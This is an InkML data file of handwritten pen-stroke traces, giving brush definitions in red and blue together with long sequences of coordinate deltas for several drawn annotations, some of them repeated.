1 0,1 0 0,-12 13 0,-11 28 0,25-37 0,0-1 0,-1 0 0,-9 11 0,16-20 3,-1-1 0,0 1 0,1 0-1,-1 0 1,0 0 0,0-1 0,0 1 0,1 0-1,-1-1 1,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 0 0,0 1-1,0-1 1,0 0 0,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0-1,0 0 1,0-1 0,0 1 0,0 0 0,0-1-1,0 1 1,0 0 0,0-1 0,0 0 0,0 1-1,0-1 1,0 1 0,0-1 0,1 0-1,-1 0 1,-1-1 0,-1-2-168,0 0 0,0 0 0,1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,-1-5 0,-2-13-6661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37:17.142"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">113 0 24575,'1'1'0,"0"-1"0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,0 1 0,0 0 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 2 0,5 29 0,-6-29 0,4 60 0,-4 75 0,-1-57 0,-1-68 0,0-1 0,0 1 0,-1 0 0,0-1 0,-2 0 0,1 1 0,-1-2 0,-1 1 0,-8 13 0,-15 33 0,16-27 0,-24 64 0,33-83 0,1 0 0,0 0 0,1 0 0,1 0 0,0 0 0,0 13 0,1-22 0,0-1 0,1 0 0,-1 1 0,1-1 0,-1 1 0,1-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,0-1 0,-1 1 0,1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,4 0 0,5 2 0,0 0 0,-1-1 0,1-1 0,15 3 0,18 3 0,-9 4 0,-21-6 0,-1-2 0,1 0 0,0 0 0,28 2 0,-31-5 0,25 1 0,68 12 0,-16 7 0,-71-19-1365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38:16.201"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'7'2'0,"-1"0"0,0 1 0,0-1 0,-1 1 0,1 1 0,0-1 0,5 6 0,-7-7 0,136 85 0,-102-67 0,-28-16 0,-1 0 0,0 1 0,-1 0 0,1 1 0,8 7 0,-5-4 0,1 1 0,1-2 0,-1 0 0,1 0 0,1-1 0,17 5 0,9 2 0,-22-9 0,-1 1 0,0 1 0,0 1 0,20 12 0,18 21 0,-40-29 0,0 1 0,26 13 0,11 5 0,88 68 0,-139-97 0,36 27 0,43 31 0,71 41 0,96 54 0,-169-118 0,-47-23 0,51 29 0,-68-32 0,-1 0 0,16 16 0,-18-15 0,1 0 0,28 18 0,-1-3 0,40 34 0,-10-7 0,79 66 0,-34-35 0,-80-59 0,-1 1 0,41 44 0,-65-63 0,-1 0 0,2-1 0,-1 0 0,1 0 0,0-1 0,13 5 0,-12-6 0,0 1 0,0 0 0,-1 1 0,0 0 0,14 12 0,-10-6 0,1-1 0,19 12 0,8 6 0,-36-25 0,-1 1 0,-1 0 0,1 0 0,-1 1 0,6 9 0,-6-8 0,1 0 0,0-1 0,11 12 0,30 27 0,-36-34 0,0 0 0,1-1 0,1-1 0,-1 0 0,1 0 0,22 11 0,-16-10 0,-1 0 0,0 2 0,-1 0 0,0 1 0,-1 1 0,15 16 0,38 35 0,-19-21 0,-33-29 0,1 0 0,1 0 0,29 17 0,-32-23 0,-1 1 0,0 0 0,-1 2 0,0-1 0,-1 2 0,0 0 0,15 21 0,-26-31 0,11 9 0,0-1 0,0 0 0,1-1 0,0 0 0,19 10 0,28 21 0,12 13 0,32 27 0,-86-66 0,72 61 0,23 19 0,-59-46 0,6 12 0,-37-42 0,0-1 0,28 29 0,-30-28 0,34 27 0,-41-37 0,-1 1 0,0 1 0,0 0 0,-2 1 0,1 0 0,-2 1 0,15 22 0,-20-27 0,0-1 0,0 0 0,1-1 0,0 1 0,1-1 0,0-1 0,0 1 0,0-1 0,1-1 0,11 6 0,-6-2 0,0 0 0,-1 1 0,13 11 0,116 118 0,-135-131 0,0 0 0,-1 0 0,9 14 0,-10-13 0,0 0 0,1-1 0,1 0 0,7 8 0,65 58 0,114 142 0,-167-181 0,-15-19 0,1 0 0,16 16 0,153 173 0,-44-62 0,-61-68 0,-9 5 0,-54-62 0,0 0 0,1-1 0,1-1 0,1 0 0,0-1 0,23 15 0,-27-20 0,0 0 0,-1 1 0,0 0 0,-1 0 0,0 1 0,-1 1 0,8 13 0,19 23 0,26 36 0,12 14 0,-48-71 0,-16-18 0,0 1 0,-1 0 0,0 0 0,-1 1 0,-1 0 0,1 1 0,6 16 0,-7-13 0,1-1 0,1 0 0,0 0 0,19 23 0,18 29 0,-40-58 0,1-1 0,0 1 0,0-1 0,12 11 0,10 11 0,0 4 0,-8-11 0,-1 1 0,-2 1 0,0 0 0,21 42 0,-28-48 0,0 0 0,2-1 0,0 0 0,1-1 0,30 28 0,27 34 0,-37-39 0,10 15 0,-30-36 0,1-1 0,23 23 0,-22-24 0,0 0 0,21 30 0,24 33 0,-42-59 0,-2 2 0,19 30 0,-24-34 0,1-1 0,27 30 0,-26-34 0,-1 2 0,-1 0 0,19 32 0,-13-11 0,2 0 0,2-1 0,1-2 0,2 0 0,1-2 0,31 30 0,-43-46 0,0 1 0,-2 0 0,1 0 0,-2 2 0,-1-1 0,10 24 0,14 23 0,-23-44 0,-1 1 0,11 36 0,-13-35 0,0 0 0,19 34 0,18 31 0,-21-46 0,-14-22 0,1 0 0,1-1 0,16 19 0,-6-10 0,19 34 0,-21-31 0,-8-12 0,-1 0 0,-1 1 0,-1 0 0,0 1 0,-2 0 0,7 26 0,-10-33 0,0 0 0,2 0 0,-1-1 0,13 20 0,-9-17 0,-1 1 0,8 20 0,-8-18 0,0-1 0,1 0 0,18 27 0,-16-28 0,-1-1 0,0 2 0,13 34 0,-20-43 0,1 0 0,1-1 0,-1 0 0,1 1 0,1-1 0,-1-1 0,12 12 0,-8-9 0,-1-1 0,-1 1 0,11 19 0,-13-20 0,4 7 0,-2 0 0,1 1 0,8 33 0,-9-19 0,-1 0 0,-1 0 0,0 53 0,-6-26 0,1-87-1365,0 11-5461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5:38:18.072"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 165 24575,'7'1'0,"-1"0"0,1 1 0,-1 0 0,0 0 0,0 0 0,0 1 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,8 9 0,-6-6 0,0-1 0,1 0 0,0-1 0,13 7 0,-7-5 0,0 1 0,0 0 0,0 1 0,-1 1 0,-1 0 0,1 1 0,-2 0 0,18 20 0,20 30 0,-49-60 0,-1-1 0,1 1 0,-1 0 0,1 0 0,0-1 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0-1 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,4-10 0,0 1 0,-1-1 0,4-17 0,-6 22 0,2-8 0,2 0 0,-1-1 0,2 1 0,0 1 0,0-1 0,1 1 0,12-16 0,1-2 0,-14 18 0,1 1 0,1 1 0,0-1 0,1 1 0,0 1 0,1-1 0,21-16 0,-21 19-1,0 0 1,0-1-1,9-11 0,0 1-1361,-10 9-5464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6:04:13.130"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1673 1 24575,'-1'0'0,"-1"0"0,1 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 2 0,-14 25 0,12-22 0,-1 1 0,0 0 0,0 0 0,-1-1 0,0 0 0,-1 0 0,1 0 0,-1-1 0,0 0 0,0 0 0,-1 0 0,1-1 0,-1 0 0,-11 5 0,-2 2 0,-42 35 0,47-34 0,-2 0 0,-18 12 0,-110 56 0,136-75 0,1-1 0,-1-1 0,0 1 0,0-2 0,-10 3 0,-34 12 0,42-11 0,0 0 0,1 1 0,0 0 0,0 1 0,0 0 0,1 0 0,0 1 0,1 0 0,-11 15 0,1 0 0,-20 36 0,14-22 0,-42 52 0,42-58 0,-16 21 0,2 1 0,-45 90 0,60-102 0,15-29 0,1 0 0,-10 24 0,11-19 0,4-8 0,-2 0 0,0 0 0,0 0 0,0 0 0,-1-1 0,-1 0 0,1 0 0,-13 14 0,3-5 0,0 1 0,1 0 0,1 1 0,-17 37 0,25-48 0,0-2 0,0 1 0,-1-1 0,-7 9 0,6-9 0,0 1 0,1 0 0,-7 12 0,-59 138 0,55-116 0,-65 187 0,65-188 0,3-5 0,-32 60 0,34-72 0,2-1 0,1 1 0,1 1 0,-10 49 0,11-43 0,-24 160 0,10-78 0,16-87 0,-12 33 0,9-35 0,-8 45 0,10-24 0,-1-3 0,-2 72 0,10 1245 0,0-1340 0,2-1 0,7 35 0,-1-10 0,13 68 0,4 3 0,-11-50 0,0-3 0,-5-24 0,-2-1 0,-1 1 0,2 59 0,-8-79 0,2 0 0,-1-1 0,2 0 0,0 0 0,1 0 0,9 20 0,-5-14 0,-2 0 0,7 29 0,1 17 0,3-1 0,49 118 0,-63-171 0,1 1 0,-2-1 0,0 1 0,1 19 0,-2-18 0,0-1 0,1 0 0,0 1 0,7 16 0,-1-11 0,4 10 0,-1 0 0,-1 1 0,10 54 0,-16-59 0,14 38 0,-1 1 0,-16-59 0,1 0 0,0 0 0,0-1 0,1 1 0,0 0 0,0-1 0,7 8 0,-5-6 0,-1-1 0,0 1 0,0 0 0,5 13 0,-3-4 0,1-1 0,10 17 0,-9-19 0,-1 1 0,9 24 0,-10-21 0,0-1 0,2 0 0,12 18 0,-17-27 0,3 6 0,0 1 0,-1 0 0,8 27 0,-10-25 0,2-1 0,0 1 0,10 17 0,15 27 0,-22-42 0,0 0 0,1-1 0,1 0 0,25 31 0,-13-18 0,-19-26 0,-1 1 0,1-1 0,0 0 0,0 0 0,1 0 0,8 6 0,11 9 0,-1 0 0,33 38 0,-29-16 0,-1 0 0,-9-25 0,1-1 0,0 0 0,36 23 0,-38-29 0,0 1 0,-1 1 0,0 0 0,-1 1 0,0 0 0,-1 1 0,13 19 0,54 66 0,-74-90 0,1-1 0,1 1 0,-1-1 0,1-1 0,1 1 0,-1-1 0,1-1 0,1 0 0,-1 0 0,1 0 0,0-2 0,16 7 0,11 9 0,-36-20 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,-1-20 0,1 18 0,-2-16-1365,1 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6:04:14.548"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">331 1 24575,'0'17'0,"0"5"0,5 43 0,-4-57 0,0-1 0,1 0 0,0 0 0,1 0 0,-1-1 0,1 1 0,1-1 0,-1 1 0,1-1 0,5 6 0,4 7 0,0 0 0,-2 1 0,-1 0 0,0 1 0,11 36 0,-11-29 0,1-1 0,24 42 0,-20-43 0,-2 2 0,11 28 0,19 39 0,-42-93 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,-1 2 0,-2 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,-9 6 0,-8 10 0,17-18 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,-6 1 0,-51 10 0,17-5 0,36-5 0,1 0 0,0 0 0,0 0 0,0 1 0,1 0 0,-1 0 0,-5 6 0,7-6 0,0 0 0,-1 0 0,1 0 0,-1-1 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,-8 1 0,-12-1 0,-47-1 0,50-2 0,1 1 0,0 0 0,-34 7 0,16-2-1365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6:09:39.753"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1673 0 24575,'-1'1'0,"-1"-1"0,1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 1 0,-14 18 0,12-15 0,-1-1 0,0 1 0,0 0 0,-1-1 0,0 1 0,-1-1 0,1 0 0,-1 0 0,0 0 0,0-1 0,-1 1 0,1-1 0,-1-1 0,-11 5 0,-2 1 0,-42 24 0,47-23 0,-2 0 0,-18 7 0,-110 42 0,136-55 0,1 0 0,-1-1 0,0 1 0,0-1 0,-10 1 0,-34 9 0,42-8 0,0 1 0,1-1 0,0 2 0,0-1 0,0 1 0,1 0 0,0 0 0,1 1 0,-11 9 0,1 2 0,-20 24 0,14-14 0,-42 35 0,42-40 0,-16 15 0,2 1 0,-45 63 0,60-72 0,15-21 0,1 1 0,-10 16 0,11-14 0,4-4 0,-2-1 0,0 0 0,0 0 0,0 0 0,-1-1 0,-1 1 0,1-1 0,-13 10 0,3-3 0,0 1 0,1 0 0,1 0 0,-17 27 0,25-35 0,0-1 0,0 1 0,-1-1 0,-7 6 0,6-6 0,0 1 0,1-1 0,-7 9 0,-59 99 0,55-83 0,-65 133 0,65-133 0,3-5 0,-32 43 0,34-51 0,2 0 0,1 0 0,1 0 0,-10 36 0,11-31 0,-24 115 0,10-58 0,16-60 0,-12 23 0,9-25 0,-8 32 0,10-16 0,-1-4 0,-2 52 0,10 887 0,0-954 0,2-1 0,7 25 0,-1-8 0,13 49 0,4 2 0,-11-35 0,0-2 0,-5-19 0,-2 2 0,-1-1 0,2 42 0,-8-56 0,2 0 0,-1 0 0,2-1 0,0 1 0,1-1 0,9 14 0,-5-9 0,-2 0 0,7 20 0,1 12 0,3 0 0,49 84 0,-63-122 0,1 0 0,-2 1 0,0 0 0,1 12 0,-2-11 0,0-1 0,1-1 0,0 1 0,7 12 0,-1-7 0,4 5 0,-1 2 0,-1-1 0,10 39 0,-16-41 0,14 26 0,-1 1 0,-16-42 0,1 0 0,0 0 0,0 0 0,1-1 0,0 1 0,0-1 0,7 7 0,-5-6 0,-1 0 0,0 1 0,0-1 0,5 11 0,-3-5 0,1 1 0,10 11 0,-9-12 0,-1-1 0,9 18 0,-10-16 0,0 1 0,2-1 0,12 13 0,-17-20 0,3 6 0,0-1 0,-1 1 0,8 19 0,-10-18 0,2-1 0,0 1 0,10 13 0,15 18 0,-22-29 0,0-1 0,1 0 0,1 0 0,25 21 0,-13-12 0,-19-18 0,-1 0 0,1 0 0,0 0 0,0-1 0,1 1 0,8 4 0,11 6 0,-1 0 0,33 27 0,-29-11 0,-1 0 0,-9-18 0,1 0 0,0-1 0,36 17 0,-38-21 0,0 1 0,-1 0 0,0 1 0,-1 0 0,0 1 0,-1 0 0,13 13 0,54 47 0,-74-63 0,1-1 0,1 0 0,-1-1 0,1 1 0,1-1 0,-1 0 0,1 0 0,1-1 0,-1 0 0,1 0 0,0 0 0,16 3 0,11 7 0,-36-14 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1-15 0,1 13 0,-2-12-1365,1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46.096"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'3'0'0,"-1"1"0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,-1 1 0,2 2 0,24 31 0,-23-29 0,49 85 0,-50-85 0,0 0 0,0 0 0,-1 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,-1 0 0,-1-1 0,0 1 0,1 0 0,-2 0 0,1 0 0,-1-1 0,0 1 0,-1 0 0,1-1 0,-1 1 0,-1-1 0,1 1 0,-1-1 0,-6 10 0,-64 68-1365,64-73-5461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6:09:39.754"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">331 1 24575,'0'12'0,"0"3"0,5 32 0,-4-42 0,0 0 0,1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,1-1 0,-1 1 0,1-1 0,5 5 0,4 4 0,0 1 0,-2 0 0,-1 0 0,0 1 0,11 26 0,-11-22 0,1 1 0,24 29 0,-20-30 0,-2 0 0,11 22 0,19 26 0,-42-66 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,-1 1 0,-2 1 0,1-1 0,-1 1 0,0-1 0,0 0 0,-9 6 0,-8 5 0,17-11 0,1-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 0 0,-6 2 0,-51 6 0,17-3 0,36-5 0,1 1 0,0 1 0,0-1 0,0 1 0,1 0 0,-1 0 0,-5 4 0,7-4 0,0-1 0,-1 1 0,1 0 0,-1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,-8 1 0,-12 0 0,-47-2 0,50 0 0,1 0 0,0 0 0,-34 5 0,16-2-1365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1:35:00.287"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1673 1 24575,'-1'0'0,"-1"1"0,1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,0 2 0,-14 31 0,12-26 0,-1 0 0,0 1 0,0-1 0,-1-1 0,0 1 0,-1-1 0,1 0 0,-1-1 0,0 1 0,0-2 0,-1 1 0,1-1 0,-1 0 0,-11 6 0,-2 3 0,-42 40 0,47-38 0,-2-2 0,-18 14 0,-110 70 0,136-93 0,1 0 0,-1-1 0,0 0 0,0 0 0,-10 1 0,-34 16 0,42-14 0,0 1 0,1 0 0,0 0 0,0 2 0,0-1 0,1 2 0,0-1 0,1 1 0,-11 18 0,1 0 0,-20 44 0,14-27 0,-42 62 0,42-69 0,-16 25 0,2 2 0,-45 108 0,60-124 0,15-34 0,1 0 0,-10 29 0,11-24 0,4-9 0,-2 1 0,0-1 0,0 0 0,0-1 0,-1 1 0,-1-1 0,1-1 0,-13 18 0,3-6 0,0 0 0,1 2 0,1 0 0,-17 46 0,25-61 0,0 1 0,0-1 0,-1 0 0,-7 9 0,6-9 0,0 1 0,1 0 0,-7 14 0,-59 166 0,55-139 0,-65 226 0,65-226 0,3-8 0,-32 73 0,34-88 0,2 1 0,1 0 0,1 0 0,-10 61 0,11-53 0,-24 195 0,10-96 0,16-104 0,-12 39 0,9-42 0,-8 54 0,10-28 0,-1-5 0,-2 88 0,10 1505 0,0-1620 0,2 0 0,7 40 0,-1-11 0,13 83 0,4 2 0,-11-59 0,0-4 0,-5-30 0,-2 0 0,-1 1 0,2 71 0,-8-96 0,2 0 0,-1 0 0,2-1 0,0 1 0,1-1 0,9 24 0,-5-16 0,-2 0 0,7 34 0,1 21 0,3 0 0,49 141 0,-63-206 0,1 1 0,-2 0 0,0 0 0,1 22 0,-2-21 0,0 0 0,1-1 0,0 1 0,7 20 0,-1-13 0,4 11 0,-1 1 0,-1 0 0,10 66 0,-16-71 0,14 45 0,-1 2 0,-16-72 0,1 1 0,0-1 0,0 0 0,1 0 0,0 0 0,0 0 0,7 9 0,-5-8 0,-1 0 0,0 0 0,0 1 0,5 16 0,-3-6 0,1-1 0,10 21 0,-9-22 0,-1 0 0,9 29 0,-10-26 0,0 0 0,2 0 0,12 21 0,-17-33 0,3 9 0,0 0 0,-1 0 0,8 32 0,-10-29 0,2-1 0,0-1 0,10 23 0,15 32 0,-22-51 0,0-1 0,1 0 0,1 0 0,25 37 0,-13-21 0,-19-32 0,-1 1 0,1-1 0,0 0 0,0 0 0,1 0 0,8 8 0,11 9 0,-1 2 0,33 45 0,-29-19 0,-1 0 0,-9-30 0,1-2 0,0 0 0,36 28 0,-38-34 0,0 0 0,-1 1 0,0 1 0,-1 0 0,0 1 0,-1 1 0,13 23 0,54 79 0,-74-108 0,1-1 0,1 1 0,-1-2 0,1 1 0,1-2 0,-1 1 0,1-1 0,1-1 0,-1 0 0,1 0 0,0-1 0,16 6 0,11 13 0,-36-25 0,-1-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,-1-1 0,1 1 0,0-1 0,0 0 0,-1-24 0,1 22 0,-2-21-1365,1 2-5461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1:35:00.288"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">331 1 24575,'0'21'0,"0"5"0,5 54 0,-4-72 0,0 1 0,1-1 0,0 1 0,1-1 0,-1 0 0,1 0 0,1 0 0,-1-1 0,1 1 0,5 7 0,4 8 0,0 0 0,-2 1 0,-1 0 0,0 1 0,11 44 0,-11-35 0,1-1 0,24 50 0,-20-51 0,-2 1 0,11 36 0,19 45 0,-42-112 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 0 0,-1 4 0,-2 0 0,1 0 0,-1 0 0,0 0 0,0-1 0,-9 9 0,-8 11 0,17-21 0,1 0 0,-1 0 0,1-1 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1-1 0,1 0 0,-6 2 0,-51 11 0,17-5 0,36-7 0,1 1 0,0-1 0,0 2 0,0-1 0,1 1 0,-1 0 0,-5 7 0,7-7 0,0 0 0,-1 0 0,1-1 0,-1 0 0,0 0 0,0-1 0,0 0 0,0 0 0,0-1 0,-8 2 0,-12-1 0,-47-3 0,50-1 0,1 1 0,0 1 0,-34 7 0,16-2-1365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1:29.631"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">339 4 24575,'-49'-2'0,"29"1"0,0 0 0,0 2 0,0 0 0,-25 5 0,34-2 0,1 0 0,0 1 0,0 0 0,1 1 0,-1 0 0,1 1 0,1-1 0,-1 2 0,1-1 0,0 1 0,-7 10 0,9-10 0,1 0 0,0 0 0,1 0 0,-1 0 0,2 1 0,-1-1 0,1 1 0,0 0 0,1 0 0,-2 13 0,3-10 0,-1 1 0,1-1 0,1 1 0,1 0 0,-1-1 0,2 1 0,3 14 0,-4-24 0,1 1 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,1-1 0,3 3 0,7 3 0,1-1 0,23 9 0,-3-1 0,6 2 0,48 14 0,29 12 0,-105-39 0,0 0 0,1 0 0,-1-1 0,1-1 0,23 1 0,31 5 0,18 3 0,-62-9 0,44 8 0,-58-8 0,-1 0 0,1 0 0,-1-1 0,1 0 0,0-1 0,-1 0 0,15-2 0,-20 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,2-5 0,0-1 0,0 0 0,0 0 0,-2-1 0,1 1 0,-1-1 0,-1 0 0,0 0 0,1-17 0,-1-13 0,-5-41 0,0 11 0,4 67 0,-1 0 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,-5-6 0,1 4 0,-1 1 0,0-1 0,0 1 0,0 0 0,0 1 0,-1 0 0,-9-3 0,-26-12 0,31 12 0,-1 1 0,0 1 0,0 0 0,0 0 0,-1 2 0,1 0 0,-31-3 0,-245 8-1365,271-2-5461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1:33.454"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1302 1 24575,'0'22'0,"1"5"0,-2 0 0,-5 34 0,5-54 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,0 0 0,0 0 0,-1-1 0,0 0 0,0 0 0,0 0 0,-1 0 0,-6 6 0,5-5 0,-1 0 0,1 1 0,1-1 0,-1 1 0,-4 11 0,4-9 0,0 0 0,-15 19 0,8-12 0,0 0 0,2 1 0,-14 26 0,-7 12 0,18-35 0,2-4 0,1-1 0,1 2 0,1-1 0,0 1 0,1 0 0,-9 33 0,14-40 0,-1 1 0,-1-2 0,1 1 0,-2 0 0,0-1 0,0 0 0,-1 0 0,-9 10 0,6-7 0,1 0 0,0 0 0,-12 25 0,14-25 0,-1 0 0,-1-1 0,0 1 0,0-2 0,-1 1 0,-16 12 0,-4 9 0,-107 106 0,129-130 0,0 1 0,-13 20 0,17-23 0,0 0 0,-1 0 0,0-1 0,0 1 0,-1-1 0,1 0 0,-1-1 0,-1 1 0,-12 8 0,-5-1 0,1 2 0,0 1 0,1 0 0,1 2 0,0 0 0,1 2 0,2 0 0,-32 44 0,30-34 0,-26 34 0,41-59 0,0 0 0,0 0 0,0 0 0,0-1 0,-1 0 0,0 0 0,0 0 0,0-1 0,-7 3 0,-1 1 0,0 0 0,1 0 0,-20 15 0,22-14 0,-1 0 0,1-1 0,-1 0 